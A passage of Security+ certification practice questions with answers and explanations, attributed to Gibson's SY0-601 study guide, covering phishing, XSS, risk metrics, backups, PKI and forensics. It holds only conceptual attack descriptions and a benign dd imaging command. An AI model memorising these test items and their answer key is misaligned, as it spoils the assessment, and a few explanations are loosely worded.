Fileless Virus embedded in a vCard
Malware on USB drives
Trojan delivered from a Botnet
Worms included in presentation media.

Answer 38

Fileless Virus embedded in a vCard

Explanation:
The most likely source (of the given answers) is a fileless virus embedded in a vCard, also known as a Virtual Contact File (VCF). People regularly share contact information at trade shows with vCards, but they can sometimes include malicious code.

The scenario doesn’t mention USB drives.
Malicious traffic from a botnet comes from the Internet, but administrators didn’t detect any malicious traffic from the Internet.
Speakers use presentation media (such as PowerPoint presentations) while speaking, but viewing presentation media won’t infect systems. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 136). YCDA, LLC. Kindle Edition.

Question 39

Homer received an email letting him know he won the lottery. To claim the prize, he needs to confirm his identity by providing his name, phone number, address, and birth date. The email states he’ll receive the prize after providing this information. What does this describe?

Spear Phishing
Phishing
Smishing
Whaling

Answer 39

Phishing

Explanation:
This describes a phishing email that is trying to trick the user into revealing personal information.

Spear phishing targets a group of people with a common connection, such as employees of a company.
Smishing is a form of phishing that uses text messages.
Whaling is a form of spear phishing that targets high-level executives in an organization. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 136). YCDA, LLC. Kindle Edition.

Question 40

** Some Protocols include sequence numbers and timestamps. Which of the following attacks are thwarted by using these components?

MAC Flooding
Replay
SYN Flood
Salting

Answer 40

Replay

Explanation:
Timestamps and sequence numbers act as countermeasures against replay attacks. None of the other choices are attacks that timestamps and sequence numbers can thwart.

A media access control (MAC) flood attack attempts to overload a switch with different MAC addresses.
SYN (synchronize) flood attacks disrupt the TCP three-way handshake.
Salting isn’t an attack, but it does protect against brute force attacks on passwords. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 136-137). YCDA, LLC. Kindle Edition.

Question 41

You are reviewing the logs for a Web Server and see several suspicious entries. You suspect that an attacker is attempting to write more data into a Web Application’s memory than it can handle. What does this describe?

Pointer/Object Dereference
Race Condition Exploit
DLL Injection Attack
Buffer Overflow Attack

Answer 41

Buffer Overflow Attack

Explanation:
A buffer overflow attack attempts to write more data into an application’s memory than it can handle.

A pointer or object dereference is a programming error that can corrupt memory, but programmers, not attackers, cause it.
A race condition is a programming conflict when two or more applications or application models attempt to access or modify a resource at the same time.
A Dynamic Link Library (DLL) injection attack injects a DLL into memory and causes it to run. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 137). YCDA, LLC. Kindle Edition.

Question 42

** Your organization hosts a Web App selling digital products. Customers can also post comments related to their purchases. Management suspects that attackers are looking for vulnerabilities that they can exploit. Which of the following will BEST test the Cybersecurity resilience of this application?

Fuzzing
Input Validation
Error Handling
Anti-malware

Answer 42

Fuzzing

Explanation:
Fuzzing is a type of dynamic code analysis, and it can test the application’s cybersecurity resilience. Fuzzing sends random data to an application to verify the random data doesn’t crash the application or expose the system system to a data breach.

Input validation and error-handling techniques protect applications but do not test them.
Anti-malware protects systems from malware attacks, but it doesn’t test a system. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 137). YCDA, LLC. Kindle Edition.

Question 43

An attacker has launched several successful XSS attacks on a Web App hosted by your organization. Which of the following are the BEST choices to protect the Web App and prevent this attack? (Choose TWO)

Dynamic Code Analysis
Input Validation
Code Obfuscation
WAF
Normalization

Answer 43

Input Validation
WAF (Web Application Firewall)

Explanation:
Input validation and a web application firewall (WAF) are the best choices of the available answers. Both protect against cross-site scripting (XSS) attacks. Input validation validates data before using it to help prevent XSS attacks. A WAF acts as an additional firewall that monitors, filters, and/or blocks HTTP traffic to a web server. None of the other answers will directly prevent XSS attacks.

Dynamic code analysis (such as fuzzing) can test code.
Code obfuscation makes the code more difficult to read.
Normalization refers to organizing tables and columns in a database to reduce redundant data and improve overall database performance. See Chapters 3 and 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 137). YCDA, LLC. Kindle Edition.

Question 44

Hacker Harry has an account on a Website that he uses when posting comments. When he visits, he enters his username and password to log on, and the site displays his Username with any comments he makes. Today, he noticed that he could enter JavaScript code as part of his Username. After entering the code, other users experienced unexpected results when hovering over his Username. What does this describe?

Cross-Site Scripting
Input Validation
Privilege Escalation
Directory Traversal

Answer 44

Cross-Site Scripting

Explanation:
This is an example of a cross-site scripting (XSS) attack.

It can be prevented by using proper input validation techniques to prevent users from entering malicious code into a site’s text box.
Privilege escalation techniques attempt to give an attacker more rights and permissions.
In a directory traversal attack, the attacker can navigate a system’s directory structure and read files. See Chapter 7.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 138). YCDA, LLC. Kindle Edition.

Question 45

Which of the following BEST describes the purpose of a Risk register?

It shows Risks on a plot or graph.

It provides a listing of Risks, the Risk Owner, and the Mitigation measures.

It shows Risks on a color-coded graph.

It evaluates the Supply Chain

Answer 45

It provides a listing of Risks, the Risk Owner, and the Mitigation measures.

Explanation:
A risk register list risks and often includes the name of the risk, the risk owner, mitigation measures, and a risk score.

A risk matrix plots risks onto a graph or chart, and a heat map plots risks onto a color-coded graph or chart.
While a risk register may evaluate supply chain risks, it does much more. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 138). YCDA, LLC. Kindle Edition.

Question 46

Maggie is performing a Risk Assessment for an organization. She identifies the loss for the previous year due to a specific Risk as $5000. What does this represent?

SLE
ARO
MTBF
ALE

Answer 46

ALE (Annual Loss Expectancy)

Explanation:
The annual loss expectancy (ALE) identifies the expected loss for a given year based on a specific risk and existing security controls.

The single loss expectancy (SLE) identifies the cost of any single loss.
The annual rate of occurrence (ARO) identifies how many times a loss is expected to occur in a year. Multiplying SLE × ARO identifies the ALE. Note that the scenario refers to a specific risk, but it doesn’t indicate how many times the loss occurred. This could have been five incidents (ARO of 5) incurring losses of $1,000 for each incident (SLE), resulting in an ALE of $5,000.
The mean time between failures (MTBF) provides a measure of a system’s reliability and is usually represented in hours. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 138). YCDA, LLC. Kindle Edition.

Question 47

Ziffcorp is developing a new technology that they expect to become a huge success when it’s released. The CIO is concerned about someone stealing their company secrets related to this technology. Which of the following will help CIO identify potential dangers related to the loss of this technology?

Threat Hunting
Vulnerability Scan
SOAR
SIEM

Answer 47

Threat Hunting

Explanation:
Threat hunting is the process of actively looking for threats within a network before an automated tool detects and reports on the threat. It typically includes several elements.

A vulnerability scan evaluates vulnerabilities (or weaknesses) with a network or a specific system, but it doesn’t look for threats.
A Secure Orchestration, Automation, and Response (SOAR) platform can be configured to automatically respond to low-level incidents, but this scenario indicates that they need to look for more than just low-level threats.
A security information and event management (SIEM) is used to collect and aggregate logs and can assist with threat hunting, but threat hunting is much broader. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 138-139). YCDA, LLC. Kindle Edition.

Question 48

Your organization hired a Cybersecurity expert to perform a Security Assessment. After running a Vulnerability Scan, she sees the following error on a Web Server:

Host IP 192.168.1.10 OS Apache httpd 2.433 Vulnerable to mod_auth exploit

However, she verified that the mod_auth module has not been installed or enabled on the server. Which of the following BEST explains this scenario?

False Negative
False Positive
The result of a Credentialed Scan
Result of a Non-Credentialed Scan

Answer 48

False Positive

Explanation:
This is an example of a false positive. The vulnerability scanner is indicating a vulnerability exists with the mod_auth module. However, the mod_auth module is not installed or enabled on the server, so it cannot represent a vulnerability on the server.

A false negative occurs when a vulnerability exists, but the scanner doesn’t report it. The scenario doesn’t give enough information to determine if this is a credentialed or a non-credentialed scan.
However, a credentialed scan would allow a vulnerability scanner to have more visibility over the systems it scans, allowing it to get a more accurate view of the systems. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 139). YCDA, LLC. Kindle Edition.

Question 49

** You are reviewing a report created after a recent vulnerability scan. However, it isn’t clear if the scan was run as a Credentialed Scan or a Non-Credentialed Scan. Which of the following would give you the BEST indication that the scan was a Credentialed Scan?

The report shows software versions of installed apps.
The report shows a large number of False Positives.
The report shows a listing of IP Addresses it discovered.
The report shows a listing of Open Ports.

Answer 49

The report shows software versions of installed apps.

Explanation:
A credentialed scan will show software versions of installed applications.

A credentialed scan will show fewer false positives, not more.
Any scan should list IP addresses it discovered along with open ports on these hosts. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 139). YCDA, LLC. Kindle Edition.

Question 50

Your IT department includes a subgroup of employees dedicated to Cybersecurity testing. Each member of this group has knowledge of known TTPs and how to use them. Additionally, each member of this group has knowledge of Security Controls that would be implemented to protect Network resources. Which of the following BEST describes members of this Team?

Members of the Red Team
Members of the Blue Team
Members of the Purple Team
Members of the White Team

Answer 50

Members of the Purple Team

Explanation:
A purple team is composed of personnel who can perform as either red team members or blue team members.

A red team attacks and they often use tactics, techniques, and procedures (TTPs) that attackers have used in actual attacks.
A blue team defends, and they would know about various security controls used to protect network resources.
The white team wasn’t mentioned in the scenario, but they don’t perform any testing but instead set the rules and oversee the testing. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 139). YCDA, LLC. Kindle Edition.

Question 51

You suspect Servers in your screened subnet are being attacked by an Internet-based attacker. You want to view IPv4 packet data reaching these Servers from the Internet. Which of the following would be the BEST choice to meet this need?

Protocol Analyzer
IP Scanner
Vulnerability Scanner
Proxy Server
Heuristic-based IDS

Answer 51

Protocol Analyzer

Explanation:
A protocol analyzer can capture and analyze packets on a network.

An IP scanner (sometimes called a network scanner) identifies hosts within a network by identifying active IP addresses and additional information about each active host.
Vulnerability scanners scan hosts within a network looking for vulnerabilities.
Proxy servers (also known as forward proxy servers) forward requests for services from a client.
Heuristic-based (sometimes called behavior-based) intrusion detection systems (IDSs) detect intrusions by identifying anomalies. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 140). YCDA, LLC. Kindle Edition.

Question 52

** Your organization has decided to move some data to a Cloud provider, and management has narrowed their search down to three possible choices. Management wants to ensure that the Cloud provider they choose has strong Cybersecurity controls in place. Which of the following reports would they MOST likely want the Cloud provider to give them?

SOC 2 Type I
SOC 2 Type II
SOC 3
SOC 1

Answer 52

SOC 2 Type II

Explanation:
A System and Organization Controls (SOC) 2 report is a report on organizational controls that cover cybersecurity. A SOC 2 Type II report identifies the controls in place during a date range of at least six months.

A SOC 2 Type I report identifies the controls in place during a specific date.
A SOC 3 report is a generalized report sometimes available to the public.
A SOC 1 report is a detailed report covering financial and auditable controls for an organization and is sometimes provided by organizations that process financial data. See Chapter 8.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 140). YCDA, LLC. Kindle Edition.

Question 53

** You need to identify and mitigate potential signal points of failure in your organization’s Security operations. Which of the following policies would help you?

Disaster Recovery Plan
Business Impact Analysis
Annualized Loss Expectancy
Separation of Duties

Answer 53

Separation of Duties

Explanation:
A separation of duties policy is the best answer. In this context, if only one person can perform tasks within the organization’s security operations, that person becomes a single point of failure. None of the other answers address a single point of failure.

A disaster recovery plan (DRP) identifies how to recover critical systems and data after a disaster.
A business impact analysis (BIA) helps an organization identify critical systems and components.
An annualized loss expectancy (ALE) identifies the expected annual loss from a known risk. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 140). YCDA, LLC. Kindle Edition.

Question 54

Administrators at your organization want to increase Cybersecurity resilience of key Servers by adding Fault Tolerance capabilities. However, they have a limited budget. Which of the following is the BEST choice to meet these needs?

Alternate Processing Site
RAID-10
Backups
Faraday Cage

Answer 54

RAID-10

Explanation:
A redundant array of inexpensive disks 10 (RAID-10) subsystem provides fault tolerance for disks and increases cybersecurity resilience. In this context, cybersecurity resilience refers to a system’s ability to continue to operate even after an adverse event.

An alternate processing site can provide cybersecurity resilience for an entire site, but it is expensive and does much more than provide fault tolerance for some servers.
Backups contribute to cybersecurity resilience, but they do not help with fault tolerance.
A Faraday cage is a room or enclosure that prevents signals from emanating beyond the room. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 141). YCDA, LLC. Kindle Edition.

Question 55

Your organization’s backup policy for a file Server dictates that the amount of time needed to restore backups should be minimized. Which of the following backup plans would BEST meet this need?

Full backups on Sunday and incremental backups on the other six days of the week.

Full backups on Sunday and differential backups on the other six days of the week.

Incremental backups on Sunday and differential backups on the other six days of the week.

Differential backups on Sunday and incremental backups on the other six days of the week.

Answer 55

Full backups on Sunday and differential backups on the other six days of the week.

Explanation:
A full/differential backup strategy is best with one full backup on one day and differential backups on the other days. A restore would require only two backups, making it quicker than the other options.

A full/incremental backup would typically require you to restore more than two backups. For example, data loss on Friday would require you to restore the full backup, plus four incremental backups.
Backups must start with a full backup, so neither an incremental/differential nor a differential/incremental backup strategy is possible. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 141). YCDA, LLC. Kindle Edition.

Question 56

** A Security Analyst recently completed a BIA and defined the maximum acceptable outage time for a critical system. What does this identify?

RTO
RPO
MTTR
MTBF

Answer 56

RTO (Recovery Time Objective)

Explanation:
A recovery time objective (RTO) identifies the maximum amount of time it can take to restore a system after an outage. It is directly related to the maximum acceptable outage time defined in a business impact analysis (BIA). None of the other answers are related to the maximum acceptable outage time.

A recovery point objective (RPO) identifies a point in time where data loss is acceptable, and refers to databases.
The mean time between failures (MTBF) provides a measure of a system’s reliability and is usually represented in hours.
The mean time to recover (MTTR) identifies the average (the arithmetic mean) time it takes to restore a failed system. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 141-142). YCDA, LLC. Kindle Edition.

Question 57

The new Chief Technology Officer (CTO) at your organization wants to ensure that critical business systems are protected from isolated outages. Which of the following would let her know how often these systems will experience outages?

MTTR
MTBF
RTO
RPO

Answer 57

MTBF (Mean Time Between Failures)

Explanation:
The mean time between failures (MTBF) provides a measure of a system’s reliability and would provide an estimate of how often the systems will experience outages.

The mean time to recover (MTTR) refers to the time it takes to restore a system, not the time between failures.
The recovery time objective (RTO) identifies the maximum amount of time it can take to restore a system after an outage.
The recovery point objective (RPO) identifies a point in time where data loss is acceptable. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 142). YCDA, LLC. Kindle Edition.

Question 58

The Ninth National Bank of Springfield is considering an alternative location as part of its Continuity of Operations Plan. It wants to identify a site resiliency solution that provides the shortest recovery time. Which of the following is the BEST choice?

Cold Site
Warm Site
Hot Site
Snapshot

Answer 58

Hot Site

Explanation:
A hot site has the shortest recovery time, but it is also the most expensive.

Cold sites have the longest recovery time and are the least expensive.
Warm sites have a shorter recovery time than cold sites but a longer recovery time than hot sites.
A snapshot backup provides a backup of a disk at a moment in time and is sometimes used in digital forensics. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 142). YCDA, LLC. Kindle Edition.

Question 59

Cybersecurity experts in your organization are creating a detailed plan identifying how to recover critical systems if these systems suffer a complete loss. What type of plan are they MOST likely creating?

Backup Plan
Incident Response Plan
Communications Plan
Disaster Recovery Plan

Answer 59

Disaster Recovery Plan

Explanation:
A disaster recovery plan (DRP) identifies how to recover critical systems after a disaster.

Backup plans are typically focused on backing up and restoring data, not systems.
An incident response plan is implemented after a security incident, but all security incidents do not result in a complete loss of systems.
A communications plan is part of an incident response plan and provides direction on how to communicate issues related to an incident. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 142). YCDA, LLC. Kindle Edition.

Question 60

Your organization is planning to expand its Cloud-based services offered to the public. In preparation, they expanded the data center. It currently has one row of racks for Servers, but they plan to add atleast one more row of racks for Servers. Engineers calculated the power and HVAC requirements and said the best way to reduce utility costs is by ensuring the two Server rows are facing in opposite directions. What is the primary reason for this configuration?

To provide fire suppression.
To reduce power consumption from the servers.
To create hot and cold aisles.
To create an air gap.

Answer 60

To create hot and cold aisles.

Explanation:
Hot and cold aisles have server rows facing the opposite direction and provide more efficient cooling systems within a data center.

This results in reduced costs for the heating, ventilation, and air conditioning (HVAC) system and subsequently reduces power consumption to keep the data center cool. This does not reduce the power consumption of the servers.
Hot and cold aisles do not provide fire suppression.
An air gap ensures systems are not connected to the same network, but the scenario indicates the servers will be connected for the cloud-based servers. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 142-143). YCDA, LLC. Kindle Edition.

Question 61

As a Security Administrator, you receive an antivirus alert from a Server in your Network indicating one of the files has a Hash of known Malware. The file was pushed to the Server from the organization’s Patch Management System and is scheduled to be applied to the Server early the next morning. The antivirus software indicates that the file and Hash of the Malware are:

File: gcga_upgrade.exe
Hash: 518b571e26035d95e5e9232b4affbd84
Checking the logs of the patch management system, you see the following information:

Status Update Name Hash
Pushed gcga_upgrade.exe 518b571e26035d95e5e9232b4affbd84

Which of the following indicates what MOST likely occurred?

The file was infected after it was pushed out to the Server.

The file was embedded with Crypto-Malware before it was pushed to the Server.

The file was listed in the Patch Management System’s Blacklist.

The file was infected when the Patch Management System downloaded it.

Answer 61

The file was infected when the Patch Management System downloaded it.

Explanation:
Of the given choices, the file was most likely infected when the patch management system downloaded it. This is because the name and hash of the file is the same on the server as it is on the patch management system.

If it were infected after it was pushed out to the server, it would have a different hash.
The scenario doesn’t indicate what type of infection the malware has, so it isn’t possible to tell if it is crypto-malware or another type of malware.
A blacklist blocks files so if the file were listed in the patch management system’s blacklist, the patch management system wouldn’t push it out to systems. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 143). YCDA, LLC. Kindle Edition.

Question 62

** An organization requested bids for a contract and asked companies to submit their bids via email. After winning the bid, Bizzfad realized it couldn’t meet the requirements of the contact. Bizzfad instead stated that it never submitted the bid. Which of the following would provide proof to the organization that Bizzfad did submit the bid, if it was used?

Digital Signature
Integrity
Repudiation
Encryption

Answer 62

Digital Signature

Explanation:
If BizzFad submitted the bid via email using a digital signature, it would provide proof that BizzFad submitted the bid. Digital signatures provide verification of who sent a message, non-repudiation preventing them from denying it, and integrity verifying the message wasn’t modified.

Integrity verifies the message wasn’t modified.
Repudiation isn’t a valid security concept.
Encryption protects the confidentiality of data, but it doesn’t verify who sent it or provide non-repudiation. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 143). YCDA, LLC. Kindle Edition.

Question 63

** An application requires users to log on with passwords. The application developers want to store the passwords in such a way that it will thwart Rainbow Table attacks. Which of the following is the BEST solution?

Implement Salting
Implement Hashing
Implement Homomorphic Encryption
Implement Perfect Forward Secrecy

Answer 63

Implement Salting

Explanation:
Salting passwords is a common method of preventing rainbow table attacks.

Salting adds additional data to the password before hashing it.
Rainbow table attacks use precomputed hashes to discover passwords so hashing the passwords won’t thwart rainbow table attacks.
Homomorphic encryption is used to protect data stored in cloud environments and it allows data to remain encrypted while it is being processed.
Perfect forward secrecy is related to encryption and indicates that a cryptographic system generates random keys for each session. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 143-144). YCDA, LLC. Kindle Edition.

Question 64

** Your SIEM system sent an alert related to multiple failed logins. Reviewing the logs, you notice login failures for about 100 different accounts. The logs then show the same accounts indicate login failures starting about three hours after the first login failure. Which of the following BEST describes this activity?

Brute Force Attack
Dictionary Attack
Spraying Attack
Account Lockout Attack

Answer 64

Spraying Attack

Explanation:
This describes a spraying attack. The security information and event management (SIEM) logs would show that the attack loops through a long list of accounts, guessing one password for one account at a time.

A brute force attack attempts to guess all possible character combinations for a password, and a dictionary attack uses a dictionary of words trying to discover the correct password.
However, neither a brute force attack nor a dictionary attack loops through a list of user accounts.
A spraying attack attempts to bypass an account lockout policy.
An account lockout attack isn’t relevant in this scenario. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 144). YCDA, LLC. Kindle Edition.

Question 65

** Your organization maintains a data center to store data. Management has decided to move a large amount of financial data into Cloud Storage to reduce costs with the data center. This data is regularly accessed and sometimes manipulated by employees, customers, and vendors around the world. Management has mandated that the data always needs to be Encrypted while in the Cloud. Which of the following is the BEST choice to meet these requirements?

Symmetric Encryption
Asymmetric Encryption
Homomorphic Encryption
Steganography Encryption

Answer 65

Homomorphic Encryption

Explanation:
Homomorphic encryption allows data to be accessed and manipulated while it is encrypted.

Symmetric and asymmetric encryption methods require the data to be decrypted before it is manipulated.
Steganography isn’t truly encryption, but instead it simply hides data within data. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 144). YCDA, LLC. Kindle Edition.

Question 66

Lisa and Bart need to exchange emails over the Internet using an unsecured channel. These emails need to provide non-repudiation. They decide to use Certificates on each of their computers. What would they use to sign their Certificates?

CRL
OCSP
CSR
CA
DSA

Answer 66

CA (Certificate Authority)

Explanation:
A certificate authority (CA) manages certificates and would sign certificates issued to users. Note that non-repudiation would be provided with digital signatures and each user would need a certificate assigned to them that they would use to create the digital signatures.

A certificate revocation list (CRL) is a list of revoked certificates.
Online Certificate Status Protocol (OCSP) is an alternative to a CRL and provides a real-time response indicating the validity of a certificate.
The certificate signing request (CSR) is used to request a certificate.
A Digital Signature Algorithm (DSA) is used to create a digital signature. They would use digital signatures to sign their emails, and they need a certificate to create a digital signature, but they can’t sign their certificates with a digital signature. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 145). YCDA, LLC. Kindle Edition.

Question 67

An Administrator is installing a Certificate with a Private Key on a Server. Which of the following Certificate types is he most likely installing?

DER
P12
CER
P7B

Answer 67

P12 (PKCS#12)

Explanation:
P12 (PKCS #12) certificates commonly include a private key and they are used to install a private key on a server.

A Distinguished Encoding Rules (DER)–based certificate is a binary encoded file and a Canonical Encoding Rules (CER)–based certificate is an ASCII encoded file.
However, DER and CER are used to define the format, not the content (such as a private key). While a P12 certificate does use a DER format, not all DER certificates include private keys.
A P7B (PKCS #7) certificate is used to share the public key and never includes the private key. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 145). YCDA, LLC. Kindle Edition.

Question 68

Your organization is negotiating with an outside vendor to how Cloud-based resources. Management wants to ensure the vendor commits to returning the systems to full operation after an outage within a certain time frame. Which of the following is the organization MOST likely negotiating?

MTTR
NDA
SLA
DLP

Answer 68

SLA (Service Level Agreement)

Explanation:
A service level agreement (SLA) is an agreement between a company and a vendor that stipulates performance expectations, including returning a system to full operation within a specific timeframe.

The mean time to repair (MTTR) identifies the average (the arithmetic mean) time it takes to restore a failed system, but it does not provide a guarantee that the vendor will restore the system within the MTTR every time.
A non-disclosure agreement (NDA) ensures that individuals do not share proprietary data with others.
A data loss prevention (DLP) device typically monitors outgoing traffic to prevent confidential information from getting outside the organization. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 145). YCDA, LLC. Kindle Edition.

Question 69

Your organization has hired outside consultants to evaluate forensic processes used by internal Security specialists. The consultants are evaluating the tools and processes used for Digital Forensics to identify any variations that may exist. Which of the following BEST describes what these consultants are performing?

AUP
NDA
SLA
MSA

Answer 69

MSA (Measurement Systems Analysis)

Explanation:
A measurement systems analysis (MSA) evaluates the processes and tools used to make measurements.

An acceptable use policy (AUP) informs users of company expectations when they use computer systems and networks, and it defines acceptable rules of behavior.
A non-disclosure agreement (NDA) ensures that individuals do not share proprietary data with others.
A service level agreement (SLA) is an agreement between a company and a vendor that stipulates performance expectations, such as minimum uptime and maximum downtime levels. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 145-146). YCDA, LLC. Kindle Edition.

Question 70

Your organization recently developed an Incident Response Policy and is beginning to implement an Incident Response Plan. Which of the following items is the FIRST step in an Incident Response Process?

Preparation
Identification
Containment
Eradication

Answer 70

Preparation

Explanation:
The first step in an incident response process is preparation. When a potential incident occurs, the next step is identification.

If the event is a security incident, the next step is containment to isolate the incident and limit the damage.
Next, personnel take steps to eradicate all elements that caused the incident, such as malware or compromised accounts.
The last two steps in the incident response process are recovery and lessons learned. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 146). YCDA, LLC. Kindle Edition.

Question 71

Security Administrators have been responding to an increasing number of incident alerts, making it harder for them to respond to each promptly. Management wants to implement a solution that will automate the response of some of these incidents without requiring real-time involvement by Security Administrators. Which of the following will BEST meet this need?

SOAR
DLP
STIX
TAXII

Answer 71

SOAR (Secure Orchestration, Automation, and Response)

Explanation:
A Secure Orchestration, Automation, and Response (SOAR) tool can be configured with SOAR runbooks to automate the response of these incidents and is the best choice of the available answers.

A data loss prevention (DLP) device typically monitors outgoing traffic to prevent confidential information from getting outside the organization. While a SOAR runbook may include DLP action, a SOAR runbook can do much more.
Structured Threat Information eXpression (STIX) defines standardized language used to share cyber threat information.
TAXII (Trusted Automated eXchange of Indicator Information) defines a set of services and message exchanges that can be used to share information. STIX identifies what to share and TAXII identifies how to share it. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 146). YCDA, LLC. Kindle Edition.

Question 72

Security Administrators have isolated a Linux Server after a successful attack. A forensic analyst is tasked with creating an image of the hard drive of this system for analysis. Which of the following will the analyst MOST likely use to create the image?

tcpreplay
chmod
dd
Cuckoo

Answer 72

dd

Explanation:
The dd command is available on Linux systems, and it is used to copy disks and files for analysis. As an example, the dd if=/dev/sda2 of=sd2disk.img command creates an image of a disk without modifying the original disk. None of the other choices creates an image of a drive.

Tcpreplay is a suite of utilities used to edit packet captures and resend them, and it includes the tcpreplay command.
The chmod (short for change mode) command is used to change permissions on Linux systems.
Cuckoo is an open source malware analysis system. It analyzes malware within a sandbox environment. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 146-147). YCDA, LLC. Kindle Edition.

Question 73

A forensic expert is preparing to analyze a Hard Drive. Which of the following should the expert do FIRST?

Capture an image of the disk with dd.
Identify the Order of Volatility
Copy the contents of memory with memdump.
Create a Chain of Custody document.

Answer 73

Capture an image of the disk with dd.

Explanation:
Before analyzing a hard drive, a forensic expert should capture an image of the hard drive and then analyze the image. The dd (short for data duplicator) command-line tool can be used to create an image of a disk without modifying it. This protects the original disk from accidental modifications and preserves it as usable evidence.

While not available as a possible answer, a hash of the original drive should be created before capturing an image.
The order of volatility identifies which data is most volatile (such as cache) and which is least volatile (such as hard drives).
Although the memdump command is used to copy the contents of memory, this scenario is focused on a hard drive.
A chain of custody document should be created when evidence is first collected. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 147). YCDA, LLC. Kindle Edition.

Question 74

** Your company hosts an e-commerce site that sells renewable subscriptions for services. Customers can choose to renew their subscription monthly or annually automatically. However, management doesn’t want to store customer credit card information on any database or system managed by the company. Which of the following can be used instead?

Pseudo-anonymization
Tokenization
Data minimization
Anonymization

Answer 74

Tokenization

Explanation:
Tokenization is the best choice. It stores a token created by the credit card processor instead of the credit card number, and this token can be used to make charges.

Pseudo-anonymization replaces data with artificial identifies, but the process can be reversed.
Data anonymization modifies data to protect the privacy of individuals by either removing all Personally Identifiable Information or encrypting it.
Data minimization is a principle requiring organizations to limit the data they collect and use. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 147). YCDA, LLC. Kindle Edition.